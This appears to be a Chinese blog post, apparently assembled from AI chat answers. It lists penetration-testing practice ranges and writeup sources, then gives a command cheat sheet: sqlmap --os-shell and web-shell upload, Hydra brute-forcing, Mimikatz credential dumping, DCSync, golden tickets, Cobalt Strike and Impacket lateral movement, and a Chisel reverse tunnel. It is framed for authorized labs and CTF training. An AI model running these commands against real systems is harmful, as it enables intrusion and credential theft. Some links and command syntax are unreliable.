其实防守也摸鱼头像
关注
从 Web 到域控:一套可打印的渗透测试工具链速查手册封面图

从 Web 到域控:一套可打印的渗透测试工具链速查手册

下面按类型帮你梳理主流渗透靶场的入口/下载地址,以及配套 WP(writeup)文章的获取途径。

🌐 在线靶场平台(打开即用)

  • DVWA(Damn Vulnerable Web Application):经典入门靶场,SQLi/XSS/文件上传/命令注入等十几种漏洞,Low→Medium→High→Impossible 四级难度可调。官网 dvwa.co.uk,也可用 Docker 一行拉起:docker run -d -p 80:80 vulnerables/web-dvwa
  • PortSwigger Web Security Academy(Burp Suite 官方靶场):覆盖 HTTP 走私、污染、SQLi、XSS、XXE、SSRF 等全部 Web 漏洞类型,每个漏洞配讲解 + 交互式实验环境,免费。入口:portswigger.net/web-security/all-labs
  • WebGoat:OWASP 官方出品,Java 版,每种漏洞带教学文档,比 DVWA 更系统。官网 owasp.org/www-project-webgoat
  • bWAPP:100 多种漏洞,覆盖几乎全部 OWASP Top 10,适合刷完 DVWA 后进阶。官网 itsecgames.com
  • Pikachu:国内作者开发,中文界面,集成 SQLi、XSS、CSRF、SSRF、文件包含/上传等,对新手极友好。GitHub 搜 pikachu 可取源码
  • SQLi-Labs / XSS-Labs / Upload-Labs:三个专项靶场,分别 75 关 SQL 注入、20 余关 XSS、20 关文件上传绕过,GitHub 搜项目名即可下载源码
  • Hack The Box(HTB):全球最火的在线渗透平台,Web/逆向/密码学/取证,每周更新靶机,积分排名在外企认可度高。入口 hackthebox.com
  • TryHackMe:比 HTB 更友好,有结构化学习路径和引导式 walkthrough,含 Windows/Linux 靶场,浏览器内置攻击机。入口 tryhackme.com
  • Root Me:法国老牌免费平台,400+ CTF 风格挑战,涵盖密码学、Web、脚本、网络、编程。入口 root-me.org
  • OverTheWire(Wargames):命令行闯关式学习,经典 Bandit/Narnia 系列,全部免费。入口 overthewire.org/wargames
  • OffSec Proving Grounds(PG 靶场):OSCP/OSEP 认证官方练习场,认可度极高。入口 offsec.com
  • 国内在线靶场:BUUCTF(buuoj.cn,历年 CTF 真题量最大)、XCTF 攻防世界(adworld.xctf.org.cn)、CTFHub(ctfhub.com,按技能树组织)、墨者学院(mozhe.cn/bug)、封神台(hack.zkaq.cn)、春秋云镜(yunjing.ichunqiu.com)、好靶场(loveli.com.cn,500+ 原创靶机)

💾 可下载靶机镜像(本地搭建)

  • VulnHub:社区贡献的靶机镜像宝库,.ova/.vmdk 格式,导入 VMware/VirtualBox 即可,含 Kioptrix 系列、DC 系列、HackTheBox 退役机器等。入口 vulnhub.com
  • Vulhub:基于 Docker + Docker-Compose 的漏洞环境集合,预置大量 Nday 场景,一键启动,适合漏洞复现和 POC 验证。官网 vulhub.org
  • Vulfocus:白帽汇推出的漏洞集成平台,Docker 镜像一键启动、自动更新 Flag、支持计分考核。入口 vulfocus.cn
  • 红日靶场(VulnStack):模拟真实企业内网,涵盖域控、黄金票据、横向移动,目前共 7 套,网上 WP 齐全。入口 vulnstack.qiyuanxuetang.net/vuln
  • HackMyVM:类似 VulnHub 的国际平台,提供虚拟机镜像,含域环境和少量 Windows 靶机。官网 hackmyvm.eu
  • Metasploitable 2/3:Rapid7 官方靶机,漏洞密集,专为 Metasploit 框架练习设计
  • CyberStrikeLab:域渗透 + 内网渗透综合场景,从 3 台到 7-8 台多层网络横向移动,部分涉及免杀。入口 cyberstrikelab.com
  • GOAD(Game of Active Directory):专注 AD 攻击技术的开源靶场,Vagrant + Ansible 自动化部署
  • VulnTarget:开源综合实战靶场,社区维护,支持提交设计

📝 WP / 通关教程文章汇总

  • DVWA 全关卡通关 + 源码审计:博客园「H轨迹H」的 DVWA 合集,覆盖暴力破解、命令注入、文件包含、文件上传、弱会话、不安全验证码、重定向、JS 攻击、CSP 绕过、未授权绕过、XSS 全部关卡的 Low→Impossible 全级别通关与代码审计,见 cnblogs.com/GuijiH6
  • DVWA SQL 注入实操笔记:FreeBuf 上的 DVWA SQLi Low/Medium/High 全级别手工注入通关,附 Payload 和原理拆解,见 freebuf.com/news/489636.html
  • VulnHub 靶机 WP:CSDN 博主「judy2580」的 DC-1、DC-2 完整渗透测试笔记,从信息收集到提权全流程记录,见 blog.csdn.net/zd8206
  • CyberStrikeLab 域渗透 WP:「【域渗透】CyberStrikelab 靶场 lab1-lab11,3w 字超详细」,是目前该靶场最完整的中文通关文档
  • HackMyVM Windows 域渗透 WP:「全网首发!HMV 全套 13 台 Windows 域渗透教程,3w 字超详细」,覆盖域控与横向移动
  • HTB 靶机 WP:如「HTB-Chemistry 靶机渗透教程」,HTB 官方论坛(forum.hackthebox.com)的「Writeups」板块也有大量社区 WP
  • CTF 解题思路合集:CSDN「50 个 CTF 实战解题核心思路」,覆盖 Web/逆向/PWN/密码学/隐写高频套路,见 blog.csdn.net/m0_56146626/article/details/159169341
  • 综合汇总帖:知乎「全网最全渗透测试靶场推荐【2026最新靶场推荐】」和 CSDN「2026网络安全实战靶场平台汇总:20个练手平台」,两篇都附带了各靶场的配套文章链接,适合作为索引收藏

💡 建议路线:DVWA → bWAPP/Pikachu → 专项靶场(SQLi-Labs、Upload-Labs)→ VulnHub/HTB 综合靶机 → 红日靶场/VulnStack 内网渗透。刷的时候建议边打边记 Payload、漏洞原理和修复方案,配合 nmap、sqlmap、hydra、Burp Suite 使用。

wp

下面把之前提到的 WP 文章逐条整理出来,能确认到的都附上了链接或明确来源;个别 WP 标题只出现在汇总帖里,但没有检索到独立可访问的原文链接,我会标注出来。

DVWA 全模块通关 + 源码审计

  • 来源:博客园「H轨迹H」
  • 内容:覆盖 DVWA 的 Brute Force、Command Injection、File Inclusion、File Upload、Weak Session IDs、Insecure CAPTCHA、Open HTTP Redirect、JavaScript Attacks、CSP Bypass、Authorisation Bypass、XSS 等模块,基本是 Low / Medium / High / Impossible 全级别通关 + 源码审计。
  • 访问方式:在博客园搜索 H轨迹H DVWA,或进入该作者博客园主页后按“DVWA靶场”系列文章浏览。
  • 说明:检索到的原文是各模块独立文章,未找到该系列“总目录页”的精确链接,所以不单独给一个固定 URL。

DVWA SQL 注入全级别通关

  • 标题:DVWA SQL 注入全级别通关笔记(Low / Medium / High / Impossible)
  • 来源:CSDN
  • 链接:https://blog.csdn.net/news/489636.html
  • 内容:Low / Medium / High / Impossible 四个级别的显注、盲注、sqlmap 用法、POST 注入绕过、Session 机制与代码审计。
  • 说明:之前提到的 FreeBuf 链接未检索到对应原文,CSDN 这篇内容更完整,建议以这篇为准。

DVWA SQL Injection 通关教程

  • 标题:DVWA靶场通关——SQL Injection篇
  • 来源:博客园 ljbguanli
  • 访问方式:博客园搜索 ljbguanli DVWA SQL Injection
  • 内容:Low 级别 Union 注入、字段数判断、回显点确认、爆库爆表爆字段;Medium 级别 POST 型注入。

DVWA 保姆级通关教程

  • 标题:dvwa靶场通关教程(保姆及教学,一看就会)
  • 来源:CSDN
  • 访问方式:CSDN 搜索 dvwa靶场通关教程 保姆
  • 内容:覆盖暴力破解、命令注入、CSRF、文件包含、文件上传、不安全验证码、SQL 注入、盲注、弱会话、DOM/反射/存储型 XSS、CSP Bypass、JS 攻击等。

VulnHub DC-1 / DC-2 通关笔记

  • 作者:judy2580
  • 来源:CSDN
  • 访问方式:CSDN 搜索 judy2580 DC-1 和 judy2580 DC-2
  • 内容:DC-1 涉及 Drupal 站点、历史漏洞利用、配置文件读取、数据库凭证获取、提权;DC-2 涉及 WordPress、SSH 弱口令、rbash 绕过、sudo 提权。
  • 补充:VulnHub DC-1 还有博客园「娜娜米」的通关文章,可搜索 VulnHub DC-1靶机通关 娜娜米。

CyberStrikeLab Lab1 及系列 WP

  • 博客园版:Cyberstrikelab Lab1,作者「巡璃27」,包含 nmap、fscan、域用户密码、NTLM 哈希、MS17-010、端口转发等过程。
  • CSDN 版:CyberStrikeLab-Lab1,涉及 EyouCMS 前台 GetShell、RCE 上线、内网扫描、域控发现、永恒之蓝等。
  • 访问方式:分别搜索 Cyberstrikelab Lab1 巡璃27 博客园、CyberStrikeLab Lab1 CSDN。
  • 说明:之前提到的“lab1-lab11 3w 字超详细 WP”确实存在于 2026 年的靶场汇总推荐中,但未检索到该长文的独立可访问链接,建议在知乎或公众号搜索 CyberStrikelab lab1-lab11 3w字 继续定位。

HackMyVM 相关 WP

  • HMV DC04:CSDN 文章《【hackmyvm】DC04靶机wp》,涉及 NTLM 中毒、SMB 探测、RPC 用户信息、压缩包破解、黄金票据、PTT 等。
  • HMV always:博客园《hackmyvm靶机 always复现》,涉及 FTP、RDP、Apache、CVE-2017-0213 提权。
  • 访问方式:分别搜索 hackmyvm DC04 wp CSDN、hackmyvm靶机 always复现 博客园。
  • 说明:之前提到的“HMV 全套 13 台 Windows 域渗透教程,3w 字超详细”在 2026 年靶场推荐文章中出现过,但未检索到该合集的独立原文链接。

HTB Chemistry 靶机 WP

  • CSDN 版:HTB:Chemistry[WriteUP],涉及 nmap、5000 端口、CIF 文件上传、CVE-2024-23346、database.db、sqlite3 查询等。
  • 博客园版:Hack The Box-Chemistry靶机渗透,作者「H轨迹H」,涉及 CVE-2024-23346 RCE、SSH 登录、CVE-2024-23334 aiohttp 路径遍历、root flag。
  • 访问方式:搜索 HTB Chemistry WriteUP CSDN 或 H轨迹H HTB Chemistry。

CTF 50 个实战解题思路

  • 标题:CTF选手必藏的50个实战解题思路!一篇够用!
  • 来源:CSDN
  • 访问方式:CSDN 搜索 CTF选手必藏的50个实战解题思路
  • 内容:Web 安全 15 个思路、逆向与 PWN 12 个技巧、密码学与隐写 13 个思路、MISC 与编程 10 个方法。
  • 说明:之前给出的带 159169341 的文章 ID 未检索到对应原文,建议按标题搜索,避免点错链接。

2026 靶场汇总类文章

  • 知乎版:拒绝信息差,全网最全渗透测试靶场推荐【2026最新版】,作者/账号“泷羽Sec”。
  • 公众号版:同名文章,内容与知乎版基本一致。
  • CSDN 版:2026网络安全实战靶场平台汇总:20个练手平台,收藏这一篇就够了!
  • 访问方式:知乎 / 微信 / CSDN 分别搜索上述标题即可。

使用建议

刷 WP 时建议按这个顺序看:先看靶场官方文档或 README,再自己打一遍,最后对照 WP 补盲区。尤其打 VulnHub、HTB、红日靶场、CyberStrikeLab 这类综合靶机时,WP 只适合复盘,不要直接照抄命令。


常用工具使用方法

结合你之前刷靶场的场景,把 nmap、sqlmap、Burp Suite、Hydra 的常用命令和实战技巧整理成一套可直接套用的速查表。

nmap:信息收集与端口/服务识别

常用扫描:

# 基础主机发现
nmap -sn 192.168.1.0/24

# 常用端口快速扫描
nmap -F 192.168.1.100

# 全端口 TCP 扫描
nmap -p- 192.168.1.100

# SYN 半开放扫描
nmap -sS -p 1-65535 192.168.1.100

# 服务版本探测
nmap -sV -p 80,443,22,3306 192.168.1.100

# 操作系统识别
nmap -O --osscan-guess 192.168.1.100

# 综合探测
nmap -A -p- 192.168.1.100

# UDP 扫描
nmap -sU -p 53,69,161,500 192.168.1.100

# 输出结果
nmap -sV -oN result.txt -oX result.xml 192.168.1.100

NSE 脚本实战:

# 漏洞检测
nmap --script vuln 192.168.1.100

# Web 目录枚举
nmap --script http-enum -p 80,443 target.com

# 心脏出血检测
nmap --script ssl-heartbleed -p 443 target.com

# 永恒之蓝检测
nmap --script smb-vuln-ms17-010 -p 445 192.168.1.0/24

# SQL 注入初筛
nmap --script http-sql-injection -p 80 target.com

# 子域名爆破
nmap --script dns-brute target.com

实战技巧:

  • 内网先 -sn 探活,再对存活主机做 -sV -A。
  • 打 HTB/VulnHub 时,先 -p- 扫全端口,避免漏掉非标准端口服务。
  • 内网横向时,smb-vuln-ms17-010 很常用。
  • 需要隐蔽时可用 --scan-delay、--max-rate、-f 分片、-D 诱饵。

sqlmap:SQL 注入检测与数据提取

基础检测:

# GET 注入检测
sqlmap -u "http://target/?id=1" --batch

# POST 注入检测
sqlmap -u "http://target/login" \
  --data "username=admin&password=123" --batch

# 从 Burp 请求文件检测
sqlmap -r request.txt --batch

# Cookie 注入
sqlmap -u "http://target/?id=1" \
  --cookie "uid=123" --batch

数据枚举:

# 枚举数据库
sqlmap -u "URL" --batch --dbs

# 枚举表
sqlmap -u "URL" --batch -D security --tables

# 枚举字段
sqlmap -u "URL" --batch -D security -T users --columns

# 导出字段
sqlmap -u "URL" --batch \
  -D security -T users -C username,password --dump

进阶利用:

# 指定注入技术
sqlmap -u "URL" --technique=BEUST --batch

# 提高检测深度
sqlmap -u "URL" --level=3 --risk=2 --batch

# 获取系统 Shell
sqlmap -u "URL" --os-shell

# 读取文件
sqlmap -u "URL" --file-read "/etc/passwd"

# 上传文件
sqlmap -u "URL" \
  --file-write shell.php --file-dest "/var/www/html/shell.php"

# WAF 绕过
sqlmap -u "URL" \
  --tamper=space2comment,between,randomcase --batch

实战技巧:

  • 靶场里先手动判断注入类型,再用 sqlmap 验证。
  • 有 WAF 时先 --identify-waf,再配合 --tamper。
  • --level 越高测试越全面,但请求量也会明显增加。
  • --os-shell 属于高风险操作,只在授权靶场里练习。

Burp Suite:抓包、重放与 Web 漏洞验证

推荐工作流:

浏览器/FoxyProxy → Burp Proxy → Repeater → Intruder → 漏洞验证

常用操作:

  • Proxy:监听 127.0.0.1:8080,浏览器配置代理并安装 Burp CA 证书。
  • Target / Scope:把靶场域名加入 Scope,减少无关流量。
  • Repeater:手工改包验证 SQLi、XSS、SSRF、越权、接口逻辑漏洞。
  • Intruder:做密码爆破、参数 fuzz、验证码/Token 绕过测试。
  • Decoder:做 Base64、URL、Hex 等编码解码。
  • Collaborator:验证盲注、SSRF、外带数据类漏洞。

Intruder 爆破登录示例:

  1. 在 Proxy 拦截登录请求。
  2. 右键 Send to Intruder。
  3. 在 Positions 里清除默认标记,只标记密码字段。
  4. 在 Payloads 加载字典,如 rockyou.txt 或自定义字典。
  5. 攻击类型选 Sniper 或 Pitchfork,观察响应长度、状态码差异。

实战技巧:

  • 浏览器优先用 Firefox,配合 FoxyProxy 管理代理。
  • HTTPS 抓包必须安装 Burp CA 证书。
  • 验证漏洞时,先在 Repeater 重放确认,再用 Intruder 批量测试。
  • 复杂接口可配合 Macros 处理 CSRF Token。

Hydra:服务弱口令爆破

SSH 爆破:

hydra -L users.txt -P pass.txt -t 6 -vV ssh://192.168.1.100

FTP 爆破:

hydra -l admin -P pass.txt -t 6 -vV ftp://192.168.1.100

HTTP POST 表单爆破:

hydra -l admin -P pass.txt -t 6 -vV \
  192.168.1.100 http-post-form \
  "/login.php:username=^USER^&password=^PASS^:Login Failed"

RDP 爆破:

hydra -L users.txt -P pass.txt -t 2 -vV rdp://192.168.1.100

MySQL 爆破:

hydra -l root -P pass.txt -t 6 -vV mysql://192.168.1.100

实战技巧:

  • 字典质量比线程数更重要,优先用针对性字典。
  • 线程数不要太高,SSH/RDP 这类服务建议 -t 2 到 -t 6。
  • 有验证码、登录锁定、WAF 时,Hydra 效果会明显下降。
  • 找到结果后加 -f 或 -F 及时停止。
  • 爆破结果可用 -o result.txt 保存。

靶场实战推荐组合

靶场场景推荐工具组合练习重点
DVWA / PikachuBurp + sqlmap + HydraWeb 漏洞、注入、爆破
SQLi-Labssqlmap + Burp Repeater注入类型判断与利用
Upload-LabsBurp + 文件上传绕过后缀、MIME、截断、解析
VulnHub / HTBnmap + Burp + sqlmap + Hydra信息收集到漏洞利用全流程
红日靶场 / VulnStacknmap + Hydra + 域渗透工具内网探测、弱口令、横向移动

所有命令只建议在本地靶场、授权环境或比赛环境中练习。打靶时可以先用 nmap 找入口,再用 Burp 分析 Web 逻辑,遇到注入上 sqlmap,遇到登录口再考虑 Hydra,这样链路会更清晰。


内网渗透/域渗透的常用工具链

结合你平时练 Kali 内网渗透、会话管理和工具部署的场景,下面这套可以当作内网/域渗透工具链速查表。全部命令只建议在本地靶场、授权环境或比赛环境里练习。

实战链路

内网入口 → 信息收集 → 凭据获取 → 横向移动 → 域路径分析 → 代理穿透 → 拿下域控

1. Mimikatz:凭据抓取与传递

基础提权与凭据抓取:

privilege::debug
sekurlsa::logonpasswords
lsadump::sam

哈希传递:

sekurlsa::pth /user:admin /domain:domain.local /ntlm:NTLM_HASH

票据操作:

sekurlsa::tickets /export
kerberos::ptt ticket.kirbi

DCSync 获取域哈希:

lsadump::dcsync /domain:domain.local /user:Administrator

黄金票据:

kerberos::golden /user:Administrator /domain:domain.local /sid:SID /krbtgt:KRBTGT_HASH /ticket:golden.kirbi
kerberos::ptt golden.kirbi

实战技巧:

  • 打靶机时先确认是否拿到管理员权限,否则 Mimikatz 很多功能会失败。
  • 抓取凭据后优先看 NTLM Hash、明文密码、Kerberos 票据三类。
  • 生产环境里 Mimikatz 极易触发告警,靶场练习时也要养成“先复现、再分析日志”的习惯。

2. Cobalt Strike:会话管理与内网穿透

启动 Team Server:

./teamserver 攻击机IP 密码

客户端连接后常用操作:

# 调整心跳
sleep 5

# 开启 SOCKS 代理
socks 1080

# 反向端口转发
rportfwd 8080 内网IP 80

# 查看会话
beacon list

# 执行系统命令
shell whoami
shell ipconfig /all
shell net user /domain

横向移动:

# PsExec
psexec \\目标IP -u 用户名 -p 密码

# WMI 横向
wmi 目标IP getsystem

# 计划任务
schtasks /create /s 目标IP /tn 任务名 /tr "payload" /sc once /st 时间

实战技巧:

  • CS 很适合练“多会话管理”,比如从入口机跳到内网多台主机。
  • HTTP/HTTPS Beacon 适合常规环境,DNS Beacon 适合只放行 DNS 的靶场。
  • 代理打通后,本地工具可通过 socks 1080 访问内网服务。

3. BloodHound:域关系可视化

数据收集:

SharpHound.exe -c All
SharpHound.exe -c All --Loop

Python 收集器:

python3 bloodhound.py -u user -p pass -d domain.local -ns DNS_IP --zip -c All

分析流程:

  1. 把 SharpHound 生成的 zip 导入 BloodHound。
  2. 运行 Shortest Paths to Domain Admins。
  3. 查找 DCSync 权限、GenericAll、本地管理员路径。
  4. 标记已控主机,重新计算攻击路径。

实战技巧:

  • BloodHound 不直接执行攻击,它帮你画“从当前用户到域管”的最短路径。
  • 打域靶场时,先跑一次 SharpHound,能大幅减少盲目枚举。

4. Impacket:远程执行与 Kerberos 攻击

远程执行:

python3 psexec.py domain/user:pass@目标IP
python3 wmiexec.py domain/user:pass@目标IP
python3 smbexec.py domain/user:pass@目标IP
python3 dcomexec.py domain/user:pass@目标IP
python3 atexec.py domain/user:pass@目标IP "whoami"

哈希传递:

python3 psexec.py -hashes :NTLM_HASH domain/user@目标IP
python3 wmiexec.py -hashes :NTLM_HASH domain/user@目标IP

凭据与 Kerberos:

python3 secretsdump.py domain/user:pass@DC_IP
python3 GetUserSPNs.py domain/user:pass -request
python3 GetNPUsers.py domain/ -usersfile users.txt -format hashcat
python3 ntlmrelayx.py -t smb://目标IP

实战技巧:

  • wmiexec 隐蔽性较好,不依赖创建服务。
  • psexec 通用性强,但痕迹相对明显。
  • GetUserSPNs.py 常用于 Kerberoasting 场景。
  • secretsdump.py 适合在拿到域管凭据后导出域内哈希。

5. 辅助横向工具

CrackMapExec 批量验证:

crackmapexec smb 192.168.1.0/24 -u administrator -H NTLM_HASH
crackmapexec smb 192.168.1.0/24 -u users.txt -p passwords.txt

Evil-WinRM 远程 PowerShell:

evil-winrm -i 目标IP -u administrator -p 密码
evil-winrm -i 目标IP -u administrator -H NTLM_HASH

RDP 横向:

xfreerdp /v:目标IP /u:administrator /p:密码

内网代理:

proxychains nmap -sT -Pn 192.168.2.10
proxychains curl http://内网IP

打靶场推荐顺序

  1. VulnHub / HTB 单靶机:练 nmap → 提权 → Mimikatz。
  2. 红日靶场 / VulnStack:练域信息收集、横向移动、CS 会话管理。
  3. CyberStrikeLab / GOAD:练 BloodHound、Kerberoasting、DCSync、黄金票据。
  4. 复盘阶段:把每一步命令、凭据、路径整理成自己的工具链笔记。

从入口机到域控的完整打靶流程模板

下面这套模板按“西湖论剑线下城市网络战”风格设计:入口机 → 内网探测 → 横向移动 → 域控 → 代理穿透 → 关键资产。团队赛里可以一人负责 Web 入口,一人负责内网探测,一人负责域渗透,一人负责代理/Flag 提交。

阶段 0:赛前准备

# 攻击机基础配置
ip a
route -n
cat /etc/resolv.conf
systemctl status network-manager

# 常用字典与工具检查
ls /usr/share/wordlists/rockyou.txt
which nmap sqlmap hydra crackmapexec evil-winrm proxychains

建议赛前把 nmap、sqlmap、Burp、Hydra、CrackMapExec、Impacket、proxychains、Chisel 全部确认可用。

阶段 1:入口机突破

# 端口与服务探测
nmap -sV -sC -p- 入口机IP
nmap -A -p 80,443,8080,8443 入口机IP

# Web 目录枚举
dirsearch -u http://入口机IP -e php,asp,html
ffuf -u http://入口机IP/FUZZ -w /usr/share/wordlists/dirb/common.txt

# 常见入口点
# - Web 后台弱口令
# - 文件上传 / 命令执行
# - SQL 注入
# - Redis / Tomcat / Jenkins 未授权
# - 旧 CMS 历史漏洞

拿到 Shell 后先做本地信息收集:

whoami
hostname
ip a
netstat -antp
cat /etc/passwd
find / -perm -4000 2>/dev/null
cat /var/www/html/config.php 2>/dev/null

阶段 2:内网探测

# 本机网络
ip a
route -n
cat /etc/resolv.conf

# 存活主机探测
nmap -sn 192.168.2.0/24
fping -ag 192.168.2.0/24

# 端口批量探测
nmap -sT -Pn -p 22,80,445,3389,135,139,8080 192.168.2.0/24

# 域信息
net user /domain
nltest /dclist:domain.local
nslookup domain.local

Windows 靶机可用:

systeminfo
whoami /all
net user
net group "Domain Admins" /domain
net view /domain

阶段 3:凭据获取

# Mimikatz
privilege::debug
sekurlsa::logonpasswords
lsadump::sam

# Impacket 远程导出
python3 secretsdump.py domain/user:pass@DC_IP

# Kerberoasting
python3 GetUserSPNs.py domain/user:pass -request

# AS-REP Roasting
python3 GetNPUsers.py domain/ -usersfile users.txt -format hashcat

拿到哈希或密码后,优先整理成表格:用户名、明文密码、NTLM Hash、所在主机。

阶段 4:横向移动

# PsExec
python3 psexec.py domain/admin:pass@目标IP

# WMIExec
python3 wmiexec.py domain/admin:pass@目标IP

# SMBExec
python3 smbexec.py domain/admin:pass@目标IP

# WinRM
evil-winrm -i 目标IP -u admin -p pass
evil-winrm -i 目标IP -u admin -H NTLM_HASH

# CrackMapExec 批量验证
crackmapexec smb 192.168.2.0/24 -u admin -p pass
crackmapexec smb 192.168.2.0/24 -u admin -H NTLM_HASH

阶段 5:域控突破

# BloodHound 收集
SharpHound.exe -c All
python3 bloodhound.py -u user -p pass -d domain.local -ns DNS_IP --zip -c All

# DCSync
python3 secretsdump.py domain/admin@DC_IP
mimikatz lsadump::dcsync /domain:domain.local /user:krbtgt

# 黄金票据
kerberos::golden /user:admin /domain:domain.local /sid:SID /krbtgt:HASH /ticket:golden.kirbi
kerberos::ptt golden.kirbi

拿下域控后,优先检查:域管账号、GPO、共享、计划任务、其他主机本地管理员。

阶段 6:代理与穿透

# CS 开启 SOCKS
socks 1080

# Chisel 反向代理
# 攻击机
chisel server -p 9999 --reverse
# 靶机
chisel client 攻击机IP:9999 R:1080:socks

# proxychains 使用
proxychains nmap -sT -Pn 10.10.10.10
proxychains evil-winrm -i 10.10.10.10 -u admin -p pass

阶段 7:Flag 与复盘

常见 Flag 位置:

/root/flag.txt
C:\Users\Administrator\Desktop\flag.txt
C:\flag.txt
/var/www/html/flag
数据库某张表
DNS TXT 记录
HTTP 响应头

复盘时建议记录:

  1. 入口点是什么。
  2. 拿到了哪些凭据。
  3. 横向路径:入口机 → 哪台主机 → 域控。
  4. 用了哪些工具。
  5. 哪些步骤卡住、为什么卡住。
  6. 如果重打一遍,哪里可以更快。

团队分工建议

角色任务常用工具
Web 手找入口、打 Web 漏洞Burp、sqlmap、dirsearch
内网手探测、凭据、横向nmap、CrackMapExec、Mimikatz
域渗透手域信息、票据、DCSyncBloodHound、Impacket、Evil-WinRM
代理/提交手隧道、Flag 提交、记录proxychains、Chisel、笔记表

这套模板适合赛前反复演练:先用红日靶场/VulnStack 跑通一遍,再把每一步命令固化成团队自己的速查表。


完整的渗透测试工具链速查手册

按 Web 渗透→内网渗透→域渗透的结构排好

下面这份已经按 Web 渗透 → 内网渗透 → 域渗透 的顺序整理好了,可以直接复制到 Obsidian、Notion、Typora 或打印成纸质速查表。全部命令只用于本地靶场、授权环境和比赛练习。

渗透测试工具链速查手册

一、Web 渗透

1. 信息收集

# 主机发现
nmap -sn 192.168.1.0/24

# 端口与服务探测
nmap -sV -sC -p- 目标IP
nmap -A -p 80,443,8080,8443 目标IP

# Web 目录枚举
dirsearch -u http://目标IP -e php,asp,html
ffuf -u http://目标IP/FUZZ -w /usr/share/wordlists/dirb/common.txt

# 子域名探测
nmap --script dns-brute 目标域名

2. 常见入口点

  • Web 后台弱口令
  • 文件上传 / 命令执行
  • SQL 注入
  • Redis、Tomcat、Jenkins 未授权
  • 旧 CMS 历史漏洞
  • SSRF、XXE、反序列化

3. SQL 注入

# GET 注入
sqlmap -u "http://target/?id=1" --batch

# POST 注入
sqlmap -u "http://target/login" \
  --data "username=admin&password=123" --batch

# 从 Burp 请求文件检测
sqlmap -r request.txt --batch

# 枚举数据库
sqlmap -u "URL" --batch --dbs

# 枚举表
sqlmap -u "URL" --batch -D security --tables

# 枚举字段
sqlmap -u "URL" --batch -D security -T users --columns

# 导出字段
sqlmap -u "URL" --batch \
  -D security -T users -C username,password --dump

# WAF 绕过
sqlmap -u "URL" \
  --tamper=space2comment,between,randomcase --batch

4. 爆破与弱口令

# SSH 爆破
hydra -L users.txt -P pass.txt -t 6 -vV ssh://目标IP

# FTP 爆破
hydra -l admin -P pass.txt -t 6 -vV ftp://目标IP

# HTTP POST 表单爆破
hydra -l admin -P pass.txt -t 6 -vV \
  目标IP http-post-form \
  "/login.php:username=^USER^&password=^PASS^:Login Failed"

# RDP 爆破
hydra -L users.txt -P pass.txt -t 2 -vV rdp://目标IP

5. Burp Suite 常用流程

浏览器/FoxyProxy → Burp Proxy → Repeater → Intruder → 漏洞验证
  • Proxy:抓包、改包。
  • Repeater:验证 SQLi、XSS、越权、逻辑漏洞。
  • Intruder:密码爆破、参数 fuzz。
  • Decoder:编码解码。
  • Collaborator:盲注、SSRF、外带数据验证。

6. 拿到 Web Shell 后

whoami
hostname
ip a
netstat -antp
cat /etc/passwd
find / -perm -4000 2>/dev/null
cat /var/www/html/config.php 2>/dev/null

二、内网渗透

1. 本机信息收集

# Linux
ip a
route -n
cat /etc/resolv.conf
cat /etc/passwd
netstat -antp
find / -perm -4000 2>/dev/null

# Windows
systeminfo
whoami /all
ipconfig /all
net user
net localgroup administrators

2. 内网存活探测

nmap -sn 192.168.2.0/24
fping -ag 192.168.2.0/24
nmap -sT -Pn -p 22,80,445,3389,135,139,8080 192.168.2.0/24

3. 服务探测

# SMB
nmap --script smb-vuln-ms17-010 -p 445 目标网段

# HTTP
nmap --script http-enum -p 80,443,8080 目标IP

# 数据库
nmap -sV -p 3306,1433,5432,6379 目标IP

4. 凭据抓取

# Mimikatz
privilege::debug
sekurlsa::logonpasswords
lsadump::sam

5. 横向移动

# PsExec
python3 psexec.py domain/user:pass@目标IP
python3 psexec.py -hashes :NTLM_HASH domain/user@目标IP

# WMIExec
python3 wmiexec.py domain/user:pass@目标IP

# SMBExec
python3 smbexec.py domain/user:pass@目标IP

# WinRM
evil-winrm -i 目标IP -u admin -p pass
evil-winrm -i 目标IP -u admin -H NTLM_HASH

# CrackMapExec 批量验证
crackmapexec smb 192.168.2.0/24 -u admin -p pass
crackmapexec smb 192.168.2.0/24 -u admin -H NTLM_HASH

6. 代理穿透

# Cobalt Strike
socks 1080

# Chisel 反向代理
# 攻击机
chisel server -p 9999 --reverse
# 靶机
chisel client 攻击机IP:9999 R:1080:socks

# proxychains 使用
proxychains nmap -sT -Pn 10.10.10.10
proxychains evil-winrm -i 10.10.10.10 -u admin -p pass

三、域渗透

1. 域信息收集

# Windows 本机
net user /domain
net group "Domain Admins" /domain
nltest /dclist:domain.local
nslookup domain.local

# Impacket
python3 secretsdump.py domain/user:pass@DC_IP

2. BloodHound 分析

SharpHound.exe -c All
SharpHound.exe -c All --Loop
python3 bloodhound.py -u user -p pass -d domain.local -ns DNS_IP --zip -c All

分析重点:

  • Shortest Paths to Domain Admins
  • DCSync 权限
  • GenericAll
  • 本地管理员路径
  • 已控主机重新计算路径

3. Kerberos 攻击

# Kerberoasting
python3 GetUserSPNs.py domain/user:pass -request

# AS-REP Roasting
python3 GetNPUsers.py domain/ -usersfile users.txt -format hashcat

# 票据传递
kerberos::ptt ticket.kirbi

4. DCSync 与黄金票据

# DCSync
python3 secretsdump.py domain/admin@DC_IP
mimikatz lsadump::dcsync /domain:domain.local /user:krbtgt

# 黄金票据
kerberos::golden /user:admin /domain:domain.local /sid:SID /krbtgt:HASH /ticket:golden.kirbi
kerberos::ptt golden.kirbi

5. 域控后检查

  • 域管账号列表
  • GPO 策略
  • 域共享
  • 计划任务
  • 其他主机本地管理员
  • DNS、ADCS、Exchange 等关键资产

四、团队赛分工模板
角色任务常用工具
Web 手找入口、打 Web 漏洞Burp、sqlmap、dirsearch、ffuf
内网手探测、凭据、横向nmap、CrackMapExec、Mimikatz
域渗透手域信息、票据、DCSyncBloodHound、Impacket、Evil-WinRM
代理/提交手隧道、Flag 提交、记录proxychains、Chisel、笔记表

五、赛前检查清单
  • nmap、sqlmap、Burp、Hydra 可用
  • CrackMapExec、Impacket、Evil-WinRM 可用
  • Mimikatz、SharpHound、BloodHound 可用
  • proxychains、Chisel 可用
  • 字典:rockyou.txt、常见弱口令字典
  • 攻击机网络、DNS、代理配置正常
  • 团队分工明确,Flag 提交流程明确

六、赛后复盘模板
  1. 入口点是什么?
  2. 拿到了哪些凭据?
  3. 横向路径:入口机 → 哪台主机 → 域控?
  4. 用了哪些工具?
  5. 哪些步骤卡住?原因是什么?
  6. 如果重打一遍,哪里可以更快?
  7. 哪些命令可以固化为团队速查表?

转载自 CSDN-专业IT技术社区

